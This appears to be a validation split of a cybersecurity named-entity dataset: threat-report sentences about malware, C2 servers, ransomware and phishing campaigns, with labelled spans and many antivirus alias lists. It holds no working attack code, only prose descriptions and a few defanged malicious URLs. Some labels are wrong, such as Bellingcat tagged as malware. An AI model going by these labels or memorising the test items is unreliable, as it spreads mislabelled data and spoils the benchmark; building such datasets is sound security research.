{"text": "GlassRAT's command and control structure has exhibited brief overlap with C2 that was identified in campaigns associated with malware originally reported in 2012 that targeted government and military organizations in the Pacific Region.", "spans": {"Malware: GlassRAT's": [[0, 10]], "System: structure": [[31, 40]], "System: C2": [[74, 76]], "Malware: malware": [[126, 133]], "Organization: targeted government": [[167, 186]], "Organization: military organizations": [[191, 213]]}, "info": {"id": "cyner2_valid_001025", "source": "cyner2_valid"}}
{"text": "In March of this year, Unit 42 investigated the SamSa actors that were attacking the healthcare industry with targeted ransomware.", "spans": {"Organization: Unit 42": [[23, 30]], "Organization: healthcare industry": [[85, 104]], "Malware: ransomware.": [[119, 130]]}, "info": {"id": "cyner2_valid_001026", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: HW32.Packed.3923 Trojan.Zbot.AM4 Trojan.Extension.Exploit Trojan.Kryptik.Win32.572826 Trojan/Kryptik.cgut BKDR_SHARIK.SMA3 Win32.Trojan.Kryptik.ho W32/Zbot.CAJ BKDR_SHARIK.SMA3 Packed.Win32.Krap.ae Trojan.Win32.Krap.dcjtjs Packer.W32.Krap.ae!c trojandropper.win32.gepys.a BehavesLike.Downloader.dc W32/Zbot.REWN-4435 Packed.Krap.euzr W32/Cryptodef.PD!tr Trojan[Packed]/Win32.Krap Trojan.Kazy.D657FD Packed.Win32.Krap.ae Trojan:Win32/Ropest.B Trojan/Win32.Necurs.R116179 Win32.Packed.Krap.Ajbo Trojan.Kryptik!bJOkWg4AxxQ Crypt.Win32.Krypti7 Win32/Herz.B Win32/Trojan.19b", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001027", "source": "cyner2_valid"}}
{"text": "Last but not least , all the overlay screens ( injects ) for the banks include two steps ; first stealing the victim ’ s login credentials , then their credit card details .", "spans": {}, "info": {"id": "cyner2_valid_001028", "source": "cyner2_valid"}}
{"text": "Servers acting as command and control for TelsaCrypt variants.", "spans": {"System: Servers": [[0, 7]], "Malware: TelsaCrypt variants.": [[42, 62]]}, "info": {"id": "cyner2_valid_001029", "source": "cyner2_valid"}}
{"text": "It will also install the malicious app “ com.qualcmm.timeservices. ” These archives contain the file “ .root.sh ” which has some comments in Chinese : Main phase In this phase , the Trojan launches the “ start ” file from Game324.res or Game644.res .", "spans": {}, "info": {"id": "cyner2_valid_001030", "source": "cyner2_valid"}}
{"text": "By using Google Cloud Messaging botnet owners can operate without a C & C server , thus eliminating the threat of the botnet being detected and blocked by law enforcement authorities .", "spans": {"System: Google Cloud Messaging": [[9, 31]]}, "info": {"id": "cyner2_valid_001031", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: VBS.Dunihi Trojan.Script.Autorun.dmmmnm Trojan-Downloader.JS.Nemucod", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001032", "source": "cyner2_valid"}}
{"text": "Record phone calls audio in 3gp format .", "spans": {}, "info": {"id": "cyner2_valid_001033", "source": "cyner2_valid"}}
{"text": "Map of potential targets Early samples of FrozenCell used an online service for storing geolocation information of infected devices .", "spans": {"Malware: FrozenCell": [[42, 52]]}, "info": {"id": "cyner2_valid_001034", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Mamianune.A Virus/W32.Mamianune Win32.Virus.Mamianune.a W32.Mamianune Win32/Ratab.A PE_GORONT.A Win32.Mamianune.A Email-Worm.Win32.Mamianune.lf Win32.Mamianune.A W32.W.Mamianune.lJsP Virus.Win32.Mamianune.A Win32.Mamianune.A PE_GORONT.A W32/Worm.RataB.6363 Worm[Email]/Win32.Mamianune.lf Win32.Mamianune.A Email-Worm.Win32.Mamianune.lf Virus.Manunya.11907 Win32.Mamianune.A Win32/Mamianune.A Virus.Win32.Mamianune_infected.if W32/Mamianune.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001035", "source": "cyner2_valid"}}
{"text": "If the value does not match , the app skips the “ disclosure ” page and billing process and brings the user straight to the app content .", "spans": {}, "info": {"id": "cyner2_valid_001037", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9990 W32.Shadesrat Trojan.MSIL.Crypt.gamf Trojan.DownLoader5.3395 Trojan.Injector.Win32.74630 BehavesLike.Win32.PWSZbot.fc WORM/Ainslot.A.706 Trojan.Strictor.D12CFF Trojan.MSIL.Crypt.gamf Trojan:MSIL/MalLoader.A Trojan/Win32.Inject.C160327 Trojan.Llac Win32.Trojan.Jorik.Lkdt Trojan.Win32.Inject Win32/Trojan.401", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001039", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Downloader.Shelcod.A Trojan-Exploit/W32.MS08-067.16384.H Exploit.Win32.MS08-067!O Trojan/Exploit.MS08-067.dw Trojan.Downloader.Shelcod.A Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Moo Win32/SMBloz.A Win.Exploit.MS08-1 Trojan.Downloader.Shelcod.A Trojan.Downloader.Shelcod.A Trojan.Win32.DownLoad1.bdwuil Trojan.Win32.EX-MS08-067.16384.L Trojan.Downloader.Shelcod.A Trojan.Downloader.Shelcod.A Trojan.DownLoad1.17537 Exploit.MS08.Win32.402 Exploit.MS08-067.jq TR/Expl.MS08-067.DW Win32.EXPLOIT.MS08-067.dw.kcloud Exploit.W32.MS08-067.dw!c Trojan.Downloader.Shelcod.A Exploit.MS08067 Win32.Exploit.Ms08-067.bltx Exploit.MS08-067!xVSxDtd39IM Exploit.Win32.MS08-067 W32/MS08_067.DW!exploit Win32/Trojan.Exploit.59a", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001040", "source": "cyner2_valid"}}
{"text": "Inside this file, we found a .lnk file, which after executing uses PowerShell to download a second stage of malware.", "spans": {"Malware: second stage of malware.": [[92, 116]]}, "info": {"id": "cyner2_valid_001041", "source": "cyner2_valid"}}
{"text": "Android banker PaloAlto Retefe is one of the most targeted banking Trojans currently in the wild.", "spans": {"Malware: Android banker": [[0, 14]], "Organization: PaloAlto": [[15, 23]], "Malware: Retefe": [[24, 30]], "Organization: banking": [[59, 66]], "Malware: Trojans": [[67, 74]]}, "info": {"id": "cyner2_valid_001042", "source": "cyner2_valid"}}
{"text": "The RAT delivered by this campaign was not particularly interesting and had all the features you would expect in such a tool.", "spans": {"Malware: RAT": [[4, 7]], "Malware: tool.": [[120, 125]]}, "info": {"id": "cyner2_valid_001043", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Graftor.D3CD95 BehavesLike.Win32.PUPXAO.cc TrojanDownloader:Win32/Strumapine.A Trojan-Downloader.Win32.Banload", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001044", "source": "cyner2_valid"}}
{"text": "The Ohagi malware is a short and basic piece of code, providing its operator extensive information about the target machine, possibly for optimizing future attacks and enhancing survivability of later stages of an assault on the victim's systems.", "spans": {"Malware: The Ohagi malware": [[0, 17]], "System: target machine,": [[109, 124]], "System: victim's systems.": [[229, 246]]}, "info": {"id": "cyner2_valid_001045", "source": "cyner2_valid"}}
{"text": "Here are some significant updates to Vawtrak: The malware now includes a DGA.", "spans": {"Malware: Vawtrak: The malware": [[37, 57]]}, "info": {"id": "cyner2_valid_001046", "source": "cyner2_valid"}}
{"text": "Many documents call out to tetrasecured[.]com/word/webstat/image.php?id= sinkholed by AlienVault to track when when they are opened.", "spans": {"Organization: AlienVault": [[86, 96]]}, "info": {"id": "cyner2_valid_001047", "source": "cyner2_valid"}}
{"text": "It is less common, and this fact may allow it to slip unnoticed by administrators and researchers.", "spans": {}, "info": {"id": "cyner2_valid_001048", "source": "cyner2_valid"}}
{"text": "As outlined in our original posting, the DealersChoice exploitation platform generates malicious RTF documents which in turn use embedded OLE Word documents.", "spans": {"Malware: malicious RTF documents": [[87, 110]]}, "info": {"id": "cyner2_valid_001050", "source": "cyner2_valid"}}
{"text": "Along with creating hourly scheduled tasks, the adware also has the potential to download additional malicious code and direct the user to compromised websites.", "spans": {"Malware: adware": [[48, 54]]}, "info": {"id": "cyner2_valid_001051", "source": "cyner2_valid"}}
{"text": "In December 2022, Nevada ransomware was advertised in criminal forums.", "spans": {"Malware: Nevada ransomware": [[18, 35]]}, "info": {"id": "cyner2_valid_001052", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: P2P-Worm.Win32!O Win32.Trojan.WisdomEyes.16070401.9500.9898 W32/Furby.A@p2p WORM_FURBY.A Win.Worm.Furby-2 P2P-Worm.Win32.Furby Trojan.Win32.Furby.empc Worm.Win32.P2P-Furby.81920 Worm.Win32.Furby.A Trojan.StartPage1.4893 WORM_FURBY.A W32/Furby.YYNU-6008 Worm/P2P.Furby Worm[P2P]/Win32.Furby Worm:Win32/Furby.A P2P-Worm.Win32.Furby HEUR/Fakon.mwf Worm.Furby Win32/Furby.A Worm.P2P.Furby W32/FURBY.A!worm.p2p W32/Byfur.A.worm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001053", "source": "cyner2_valid"}}
{"text": "As a result , the Trojan delete button in the list of applications becomes inactive , which may cause problems for inexperienced users .", "spans": {}, "info": {"id": "cyner2_valid_001054", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/Tofsee.av Win32.Trojan.WisdomEyes.16070401.9500.9999 TSPY_ZBPAK.SML2 Trojan.Win32.DownLoad3.cxnnmp TrojWare.Win32.Kryptik.BAXQ Trojan.DownLoad3.21597 Trojan.Zbot.Win32.117645 TSPY_ZBPAK.SML2 BehavesLike.Win32.ICLoader.kh Trojan[Spy]/Win32.Zbot Trojan.Renos.43 TrojanDownloader:Win32/Tofsee.D BScope.Malware-Cryptor.SB.01798 Trj/Hexas.HEU Win32/Tofsee.AV Trojan.Win32.Yakes W32/Zbot.FG!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001055", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Worm.TUC Trojan.Folcom Win32.Worm.TUC W32.SillyFDC Win32.Worm.TUC Win32.Worm.TUC TrojWare.Win32.Injector.XYNZ Trojan.MulDrop5.40123 Win32.Worm.TUC Trojan:Win32/Folcom.A Trojan/Win32.Folcom.R158004 Win32.Worm.TUC", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001056", "source": "cyner2_valid"}}
{"text": "The Securonix Threat Research team has identified an ongoing hyper-targeted phishing campaign TACTICAL#OCTOPUS targeting individuals in the US using seemingly valid tax forms and contracts.", "spans": {"Organization: The Securonix Threat Research team": [[0, 34]], "Organization: individuals": [[121, 132]]}, "info": {"id": "cyner2_valid_001058", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: PWS-OnlineGames.cn Trojan.Win32.Vaklik.srhd W32/Trojan2.BDOH Vaklik.ATF Trojan.Spy-47164 Trojan.Win32.Vaklik.bha Trojan.Vaklik.K Trojan.Win32.Vaklik.15917 TrojWare.Win32.Magania.~AP Trojan.Vaklik.K Trojan.MulDrop.17281 PWS-OnlineGames.cn Trojan:Win32/Vaklik.A Trojan/Win32.OnlineGameHack Trojan.Vaklik.K W32/Trojan.CNYI-4128 Trojan.Win32.Vaklik W32/OnlineGames.BHA!tr Trj/Lineage.LET", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001059", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: WS.Reputation.1 Trojan.DownLoader11.18813", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001060", "source": "cyner2_valid"}}
{"text": "According to our data , 0.4 % of the websites visited by users of our products were compromised sites .", "spans": {}, "info": {"id": "cyner2_valid_001062", "source": "cyner2_valid"}}
{"text": "FireEye analyzed a Microsoft Word document where attackers used the arbitrary code injection to download and execute a Visual Basic script that contained PowerShell commands.", "spans": {"Organization: FireEye": [[0, 7]]}, "info": {"id": "cyner2_valid_001063", "source": "cyner2_valid"}}
{"text": "Svpeng is only currently attacking clients of Russian banks .", "spans": {"Malware: Svpeng": [[0, 6]]}, "info": {"id": "cyner2_valid_001064", "source": "cyner2_valid"}}
{"text": "Both the Google Play Store pages and the decoys of the malicious apps are in Italian .", "spans": {"System: Google Play Store": [[9, 26]]}, "info": {"id": "cyner2_valid_001065", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Mdropper Win32.Mdropper Exploit.Rtf.based EXP/Rtf.E Trojan:Win32/Rtfdrop.C Trojan.Mdropper Data/CVE20103333.A!exploit", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001066", "source": "cyner2_valid"}}
{"text": "] com hxxp : //mailsa-qaf [ .", "spans": {}, "info": {"id": "cyner2_valid_001067", "source": "cyner2_valid"}}
{"text": "And TikTok is no exception .", "spans": {"System: TikTok": [[4, 10]]}, "info": {"id": "cyner2_valid_001068", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/Demtranc.aa BKDR_DEMTRANC.C Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Risk.XJQA-1744 Backdoor.Trojan BKDR_DEMTRANC.C W32/MalwareF.HOCF Trojan:Win32/Demtranc.C Trojan:Win32/Demtranc.C Trojan/Win32.Demtranc.R196 Trojan-PWS.Win32.Small W32/Demtranc.AA!tr Win32/Trojan.b7f", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001069", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.FakeFolder Win32.Trojan.WisdomEyes.16070401.9500.9943 Trojan.Win32.CFI.cqhtqx Trojan.MulDrop5.19111 Trojan/Krastic.a Worm:Win32/YahLover.K Trojan.Heur.FmGfrnQe6hhib HEUR/Fakon.mwf Trojan.Win32.Spy", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001070", "source": "cyner2_valid"}}
{"text": "Permissions The package name follows the original style name used on DenDroid .", "spans": {"Malware: DenDroid": [[69, 77]]}, "info": {"id": "cyner2_valid_001071", "source": "cyner2_valid"}}
{"text": "All of this is possible because of its modular nature.", "spans": {}, "info": {"id": "cyner2_valid_001072", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan-Spy/W32.ZBot.1251328 TROJ_HPUTOTI.SMQ Win32.Trojan.WisdomEyes.16070401.9500.9590 W32.Golroted Trojan-Spy.Win32.Zbot.yopt Trojan.Win32.Z.Zbot.1251328 Troj.Spy.W32.Zbot!c Trojan.PWS.Stealer.19347 TR/AD.Inject.pfzxb Trojan-Spy.Win32.Zbot.yopt Trj/CI.A Trojan.Inject AutoIt/Injector.DCY!tr Win32/Trojan.01c", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001073", "source": "cyner2_valid"}}
{"text": "Threatstream Labs came across an interesting FrameworkPOS sample that given it is two months old, its digitally signed and its certificate hasn't been revoked.", "spans": {"Organization: Threatstream Labs": [[0, 17]], "Malware: FrameworkPOS": [[45, 57]]}, "info": {"id": "cyner2_valid_001074", "source": "cyner2_valid"}}
{"text": "Threat actors delivered the same document via spear-phishing emails to both organizations.", "spans": {"Organization: organizations.": [[76, 90]]}, "info": {"id": "cyner2_valid_001075", "source": "cyner2_valid"}}
{"text": "The attack involved a spear-phishing email sent to a single French diplomat based in Taipei, Taiwan and contained an invitation to a Science and Technology support group event.", "spans": {"Organization: French diplomat": [[60, 75]]}, "info": {"id": "cyner2_valid_001076", "source": "cyner2_valid"}}
{"text": "The additional commands that attackers can carry out via a socket connection ( top ) and the key used to encrypt the stolen data ( bottom ) Correlating Bouncing Golf 's Activities We monitored Bouncing Golf ’ s C & C-related activities and saw that the campaign has affected more than 660 devices as of this writing .", "spans": {"Malware: Bouncing Golf": [[152, 165], [193, 206]]}, "info": {"id": "cyner2_valid_001077", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.FulicoLTQ.Trojan Worm.RJump.A Worm/W32.RJump.3514318.B Worm.RJump.A Worm.RJump.Win32.1 W32/RJump.g Worm.RJump.A W32/RJump.D W32.Rajump Win32/RJump.D WORM_RJUMP.A Win.Worm.RJump-4 Worm.RJump.A Worm.Win32.RJump.a Worm.RJump.A Trojan.RJump.ghkp Worm.Win32.RJump.3514318 W32.W.RJump.kZfP Worm.RJump.A Worm.Win32.RJump.A0 Trojan.Iespy WORM_RJUMP.A W32/RJump.worm Worm.Win32.RJump W32/RJump.AKZT-0686 Trojan/StartPage.fo Worm:Win32/Rjump.J Worm/Win32.RJump.a Worm:Win32/RJump.J Worm.Win32.RJump.a Worm/Win32.RJump.R17519 W32/RJump.worm Bck/Ravmon.B Win32/RJump.A Win32.Worm.Rjump.Alsj Worm.RJump!KbA9JqtFC8g", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001079", "source": "cyner2_valid"}}
{"text": "Method onPostExecute parses the response from the above HTTP session and executes the commands provided by the remote attacker .", "spans": {}, "info": {"id": "cyner2_valid_001081", "source": "cyner2_valid"}}
{"text": "Gathered file Type Description lock Text Implant log ldata sqlite3 Location data based on network ( cell_id ) gdata sqlite3 Location data based on GPS coordinates sdata sqlite3 SMS messages f.db sqlite3 Facebook messages v.db sqlite3 Viber messages w.db sqlite3 WhatsApp messages Among the other data gathered were SMS banking messages that revealed an account with a balance of more than US $ 10,000.But as far as we know , the attacker behind this campaign is not interested in stealing the victims ’ money .", "spans": {"System: Facebook": [[203, 211]], "System: Viber": [[234, 239]], "System: WhatsApp": [[262, 270]]}, "info": {"id": "cyner2_valid_001082", "source": "cyner2_valid"}}
{"text": "In the unpacked core we found strings suggesting that the authors named the project Shakti, which means power in Hindi or may also be a reference to the Shakti goddess.", "spans": {}, "info": {"id": "cyner2_valid_001083", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Vasdek Win32.Trojan.Graftor.Lneg Backdoor.Win32.Hupigon Trojan.Graftor.D48DBE RiskWare.HangVote! Win32/Trojan.97a", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001084", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.NSIS.Sinis.A Nsis.Dropper.Cv!c Trojan.Carberp.663 TrojanDownloader:Win32/Sinis.C Trj/CI.A W32/Dx.BCQS!tr Win32/Trojan.Dropper.552", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001085", "source": "cyner2_valid"}}
{"text": "Figure 2 – Granting Permissions The following permissions are granted to the app : Figure 3 – Permissions Granted to App A closer look at the code reveals the application gathers a list of installed applications to compare the results against a list of targeted applications ( Figure 4 ) .", "spans": {}, "info": {"id": "cyner2_valid_001086", "source": "cyner2_valid"}}
{"text": "Asacub versions Sewn into the body of the Trojan is the version number , consisting of two or three digits separated by periods .", "spans": {"Malware: Asacub": [[0, 6]]}, "info": {"id": "cyner2_valid_001087", "source": "cyner2_valid"}}
{"text": "In this case paying the attackers will not help get any files back.", "spans": {}, "info": {"id": "cyner2_valid_001088", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.CHM.Downloader.5065 Exploit.CHM.Downloader HTML.Trojan-Downloader.Posh.D Exploit.Chm.Downloader!c HEUR_CHM.E Exploit:Win32/Trupto.A Exploit.Win32.Trupto Win32/Trojan.Exploit.4f5", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001089", "source": "cyner2_valid"}}
{"text": "Forcepoint Security Labs™ recently encountered a strain of attacks that appear to target Pakistani nationals.", "spans": {"Organization: Forcepoint Security Labs™": [[0, 25]], "Organization: Pakistani nationals.": [[89, 109]]}, "info": {"id": "cyner2_valid_001090", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Win32.Prorat-19.fwto W32/TrojanX.CKO BKDR_AVW.A Trojan.MulDrop.1246 BKDR_AVW.A W32/Trojan.BGRF-7808 WORM/Prorat.351276 BScope.Trojan.Dropper.we Trojan.Win32.Dropper.Aouw Backdoor.Win32.Prorat", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001091", "source": "cyner2_valid"}}
{"text": "Pin request overlay This overlay asks the user to provide their PIN to unlock the mobile device , which is immediately exfiltrated to the C2 .", "spans": {}, "info": {"id": "cyner2_valid_001092", "source": "cyner2_valid"}}
{"text": "Therefore, the Korea Financial Security Institute FSI identified the specific characteristics of domestic IT and work environment, and profiled specific threat groups that are using the attacks.", "spans": {"Organization: the Korea Financial Security Institute FSI": [[11, 53]], "Organization: domestic IT": [[97, 108]], "Organization: work environment,": [[113, 130]]}, "info": {"id": "cyner2_valid_001093", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Heur.Packed.Unknown FakeAlert.PY", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001094", "source": "cyner2_valid"}}
{"text": "Upon creation the class will start to take screenshots that will be stopped and uploaded to the C2 once the service ca n't find the targeted applications running .", "spans": {}, "info": {"id": "cyner2_valid_001095", "source": "cyner2_valid"}}
{"text": "It is also able to move code execution into different locations if needed .", "spans": {}, "info": {"id": "cyner2_valid_001096", "source": "cyner2_valid"}}
{"text": "A complete list of hashes can be found here .", "spans": {}, "info": {"id": "cyner2_valid_001097", "source": "cyner2_valid"}}
{"text": "We also found that recent publications on the group's activity have done nothing to change their behavior or reduce their activity.", "spans": {}, "info": {"id": "cyner2_valid_001098", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Udsdangerousobject.Multi BackDoor-EPJ.a Trojan/Delf.ajsi BKDR_DELF.SMR Win32.Trojan.WisdomEyes.16070401.9500.9989 Backdoor.Trojan BKDR_DELF.SMR Win.Trojan.Delf-20678 Trojan.Win32.Delf.brsrqp Trojan.Win32.Z.Delf.836986 Trojan.Delf.Win32.27370 BehavesLike.Win32.Dropper.ch Trojan/Delf.nbp Win32.Troj.DelfCode.ab.kcloud Trojan.Graftor.D6F46 Backdoor:Win32/Exsorv.A Trojan/Win32.Delf.R48296 Win32.Trojan.Delf.Eerb Trojan.Delf!+mMB+iIfbgw W32/Delf.NTBZ!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001099", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Dynamer.S18607 Trojan.Razy.D39CC3 Win32.Trojan.WisdomEyes.16070401.9500.9989 TSPY_ZBOT_GA250A16.UVPM Trojan.Win32.Panda.elkrhc Trojan.Win32.Z.Zbot.143360.ET Trojan.PWS.Panda.11620 Trojan.Zbot.Win32.198737 TSPY_ZBOT_GA250A16.UVPM BehavesLike.Win32.TrojanShifu.ch TrojanDownloader:Win32/Macapy.A!bit BScope.Trojan-Spy.Zbot Win32.Trojan.Downloader.Wtxj Win32/Trojan.Downloader.18b", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001100", "source": "cyner2_valid"}}
{"text": "Using the ThreatConnect platform we ingested the spear-phishing emails Bellingcat provided, processed out the relevant indicators, and compared them to previously known Fancy Bear activity.", "spans": {"System: the ThreatConnect platform": [[6, 32]], "Malware: Bellingcat": [[71, 81]]}, "info": {"id": "cyner2_valid_001101", "source": "cyner2_valid"}}
{"text": "A few days later they can cancel the trial and do not need to pay a penny .", "spans": {}, "info": {"id": "cyner2_valid_001102", "source": "cyner2_valid"}}
{"text": "When this shortcut file is opened, the host will be infected with malware called Asruex", "spans": {"Organization: host": [[39, 43]], "Malware: malware": [[66, 73]], "Malware: Asruex": [[81, 87]]}, "info": {"id": "cyner2_valid_001103", "source": "cyner2_valid"}}
{"text": "It disguises itself as an anti-virus product, and attempts to encourage users into purchasing a non-existent protection.", "spans": {}, "info": {"id": "cyner2_valid_001104", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: TROJ64_COINMINER.SMB Trojan.BtcMine.1165 BehavesLike.Win64.Ramnit.hh Trojan.Win64.CoinMiner TrojanDropper:Win32/Dapato.M!bit", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001105", "source": "cyner2_valid"}}
{"text": "This malware is not a ransomware and is not a bitcoin miner either as others have reported.", "spans": {"Malware: malware": [[5, 12]], "Malware: ransomware": [[22, 32]], "Malware: a bitcoin miner": [[44, 59]]}, "info": {"id": "cyner2_valid_001106", "source": "cyner2_valid"}}
{"text": "Proofpoint researchers have uncovered that the threat actor commonly referred to as FIN7 has added a new JScript backdoor called Bateleur and updated macros to its toolkit.", "spans": {"Organization: Proofpoint researchers": [[0, 22]], "Malware: a new JScript backdoor": [[99, 121]], "Malware: Bateleur": [[129, 137]], "Malware: macros": [[150, 156]], "Malware: toolkit.": [[164, 172]]}, "info": {"id": "cyner2_valid_001107", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9883 W32/Pws.ALMI Win.Spyware.42247-1 BehavesLike.Win32.Ransomware.dc W32/PWS.PONN-0793 W32.Malware.Downloader", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001109", "source": "cyner2_valid"}}
{"text": "The attackers modified a few lines of code, recompiled the program, and disbursed the trojanized version on compromised web servers.", "spans": {"Malware: trojanized version": [[86, 104]]}, "info": {"id": "cyner2_valid_001110", "source": "cyner2_valid"}}
{"text": "All of these methods attempt to space out the introduction of possible signals in various stages , testing for gaps in the publication process .", "spans": {}, "info": {"id": "cyner2_valid_001111", "source": "cyner2_valid"}}
{"text": "One of the latest ransomware variants is called TeslaCrypt and appears to be a derivative of the original Cryptolocker ransomware.", "spans": {"Malware: ransomware": [[18, 28]], "Malware: TeslaCrypt": [[48, 58]], "Malware: Cryptolocker ransomware.": [[106, 130]]}, "info": {"id": "cyner2_valid_001112", "source": "cyner2_valid"}}
{"text": "So I don ’ t know what kind of files will be executed , but they could be malicious or advertising files .", "spans": {}, "info": {"id": "cyner2_valid_001113", "source": "cyner2_valid"}}
{"text": "This threat group has been around for quite a while, and commonly operated tangentially to APT1 intrusions into defense contractors and aerospace companies.", "spans": {"Organization: defense contractors": [[112, 131]], "Organization: aerospace companies.": [[136, 156]]}, "info": {"id": "cyner2_valid_001115", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojandownloader.Pogolcil Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Kryptik.ewytqt Trojan.Win32.Z.Kryptik.208896.OT TR/Crypt.ZPACK.bggbz TrojanDownloader:Win32/Pogolcil.E!bit Trojan.Win32.Crypt Trj/GdSda.A Win32/Trojan.5c0", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001117", "source": "cyner2_valid"}}
{"text": "The new variant caught our attention because it ’ s an advanced malware with unmistakable malicious characteristic and behavior and yet manages to evade many available protections , registering a low detection rate against security solutions .", "spans": {}, "info": {"id": "cyner2_valid_001119", "source": "cyner2_valid"}}
{"text": "Technical and temporal analysis of the campaign supports these statements and indicates a direct correlation between the cyber attacks and the ongoing war, highlighting an alarming blend between cyber espionage, physical warfare, and the driving political forces behind them.", "spans": {}, "info": {"id": "cyner2_valid_001120", "source": "cyner2_valid"}}
{"text": "The attacks use multiple exploits in an attempt to gain root access on a device .", "spans": {}, "info": {"id": "cyner2_valid_001121", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.eHeur.Virus02 Trojan-Dropper/W32.Dapato.642320 Trojan-Dropper.Win32.Dapato!O Trojan/Dropper.Dapato.bkcv BKDR_XTRAT.LTY BKDR_XTRAT.LTY Trojan.Win32.Trojan-Dropper.ychad Dropper.Dapato.Win32.29248 W32/Trojan.AOFQ-7014 TrojanDropper.Dapato.ijj TR/Drop.Dapato.bkcv Trojan:Win32/Skymper.A TrojanDropper.Dapato Trj/CI.A Win32/Poison.NLN Win32.Trojan.Falsesign.Gbv Trojan-Dropper.Win32.Dapato W32/Dapato.BKCV!tr Win32/Trojan.0cc", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001122", "source": "cyner2_valid"}}
{"text": "Just in time for the holidays, a brand new Point Of Sale POS malware family has been discovered.", "spans": {"Malware: Point Of Sale POS malware family": [[43, 75]]}, "info": {"id": "cyner2_valid_001123", "source": "cyner2_valid"}}
{"text": "Accessing the same malicious site would redirect its user to another malicious website ( hxxp : //apple-icloud [ .", "spans": {}, "info": {"id": "cyner2_valid_001124", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/Arcdoor.te Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan.Win32.MLW.cxmnch Trojan.DownLoader4.56100 Worm.MSIL.gb Worm/MSIL.Arcdoor Trojan:MSIL/Stooten.A Worm/Win32.Arcdoor.C80706 Worm.MSIL.Arcdoor", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001125", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/W32.Cheater.32256 W32.Sharmovo.A8 Trojan/Remtasu.a Win32.Trojan.Delf.q Win32/Tnega.VIIYB TROJ_ENEG.SMUM2 Trojan.Win32.KillFiles.cqjidr W32.Lamer.lymQ TrojWare.Win32.Delf.edn Trojan.KillFiles.11968 TROJ_ENEG.SMUM2 BehavesLike.Win32.HLLP.nh Trojan/Resetter.e TR/Resetter.agah Trojan/Win32.Resetter Trojan.Heur.ED60A7 Trojan:Win32/Sharmovo.A Trojan/Win32.Resetter.R19869 Trojan.Resetter Trojan.Win32.Spy W32/Delf.BSE!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001126", "source": "cyner2_valid"}}
